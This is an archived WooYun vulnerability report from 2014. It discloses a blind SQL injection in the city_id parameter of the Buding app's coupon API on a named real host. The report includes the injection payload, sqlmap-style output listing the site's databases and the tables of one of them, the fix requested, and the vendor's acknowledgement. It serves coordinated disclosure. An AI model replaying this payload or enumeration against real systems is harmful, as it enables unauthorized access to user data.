乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-17: 细节已通知厂商并且等待厂商处理中 2014-02-24: 厂商已经确认,细节仅向厂商公开 2014-03-06: 细节向核心白帽子及相关领域专家公开 2014-03-16: 细节向普通白帽子公开 2014-03-26: 细节向实习白帽子公开 2014-04-03: 细节向公众公开
创新工场的同学,说好的礼物呢?...
继续挖一下最新版的布丁APP(V3.7.1)一处sql注射APP抓包url:
http://m.2000tuan.com:80/coupon3.7/view/discovery.php?platform_model=iPhone%204&platform_model=iPhone%204&mac_addr=NA&platform=iPhone&longitude=0.00000000&imei=NA&version=3.7.1&city_id=1&latitude=0.00000000&system_version=5.1.1&imsi=iPhone&device_token=%3Ccadbf9b6%20197**d22%20f6ef58dc%20cb76461c%20404417f9%204502**56%2077b91b91%20c14e39c0%3E&openudid=fbc***ed0cf5eb6531b4902be5c**3541c2ed178
其中参数‘city_id’过滤不严,存在注入。
Place: GETParameter: city_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: platform_model=iPhone 4&platform_model=iPhone 4&mac_addr=NA&platform=iPhone&longitude=0.00000000&imei=NA&version=3.7.1&city_id=1 AND 1883=1883&latitude=0.00000000&system_version=5.1.1&imsi=iPhone&device_token=<cadbf9b6 19**0d22 f6ef58dc cb76461c 404417f9 45027356 77b91b91 c14e39c0>&openudid=fbc20***0cf5eb6531b4902be5c393541c**d178---[09:23:44] [INFO] testing MySQL[09:23:47] [INFO] confirming MySQL[09:23:47] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.1.6back-end DBMS: MySQL >= 5.0.0
跑了下用户
available databases [10]:[*] coupon_ads[*] coupons[*] faceshow[*] findapp[*] gift[*] information_schema[*] mysql[*] parter[*] test[*] tuangou
看了下团购的表
[09:41:43] [INFO] retrieved: 10[09:41:46] [INFO] retrieved: category[09:41:54] [INFO] retrieved: city[09:41:58] [INFO] retrieved: counttable[09:42:06] [INFO] retrieved: deal[09:42:20] [INFO] retrieved: finalpicnumber[09:42:34] [INFO] retrieved: lastdeal[09:42:51] [INFO] retrieved: liuyan[09:42:55] [INFO] retrieved: shopinfo[09:43:04] [INFO] retrieved: sites[09:43:20] [INFO] retrieved: userinfo
上面
#1 过滤相关参数.#2 落实之前的礼物....求给力~~:)
危害等级:低
漏洞Rank:5
确认时间:2014-02-24 17:47
谢谢少年,已转给我们布丁相关同学。
暂无